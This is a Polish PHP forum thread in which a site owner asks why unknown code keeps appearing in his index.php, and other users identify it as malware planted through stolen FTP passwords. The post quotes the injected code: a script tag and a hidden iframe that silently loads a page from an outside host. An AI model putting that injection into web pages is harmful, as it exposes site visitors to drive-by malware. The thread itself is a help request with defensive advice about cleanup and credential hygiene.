Pomoc - Szukaj - Użytkownicy - Kalendarz
Pełna wersja: [PHP][HTML]Przesuwajacy sie obrazek główny
Forum PHP.pl > Forum > Przedszkole
gadhet
Witam,

Napisałem sobie narazie wstępnie stronę www.historie-sukcesu.pl, która będzie rozbudowywana, ale zauważyłem ze główna strona index.php troche mi sie rozjezdza zdjęcie przesuwa sie w dół. Podglądając źródło strony zaobserwowałem, że do kodu mojego pliku index.php wrzucany jest jakis kod dodatkowy a mianowicie:

Kod
<script charset="utf-8" id="injection_graph_func" src="chrome://skype_ff_toolbar_win/content/injection_graph_func.js"></script></head><body><iframe src="http://ixcx.in:8080/index.php" style="visibility: hidden;" width="111" height="176"></iframe>

Ja wogóle sam tego nie wpisywałem a pojawia sie co chwile i tak zostaje az do momentu jak recznie nie usune tego i znowu nie wrzuce pliku na serwer. MOze mi ktos pomoc jak sie tego pozbyc, albo zapobiegac.

Z góry dzieki za pomoc.

Pozdrawiam,
gadhet
Wicepsik
Zmień hasła do Total Commandera i nie zapisuj ich w TC. Skasuj to coś i wrzuć ponownie na serwer.
gadhet
Nie bardzo rozumiem, o co chodzi z hasłami Total Comandera?
Wicepsik
To jest ramka a na stronie wirus. Zapisujesz haslo do klienta ftp w tym programie ?
gadhet
Chodzi Ci czy w TC zapisuje haslo aby polaczyc sie z FTP? Jesli o to chodzi to, tak....
Wicepsik
To nie zapisuj.. i najpierw zmień to hasło winksmiley.jpg
gadhet
Jakie haslo mam zmienic, haslo dostepowe do serwera gdzie mam strone?
marian2299
Tak, a co niby?!

Edit: Avast pokazuje wirusa, więc ty też pewnie jesteś zarażony.
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.
Invision Power Board © 2001-2025 Invision Power Services, Inc.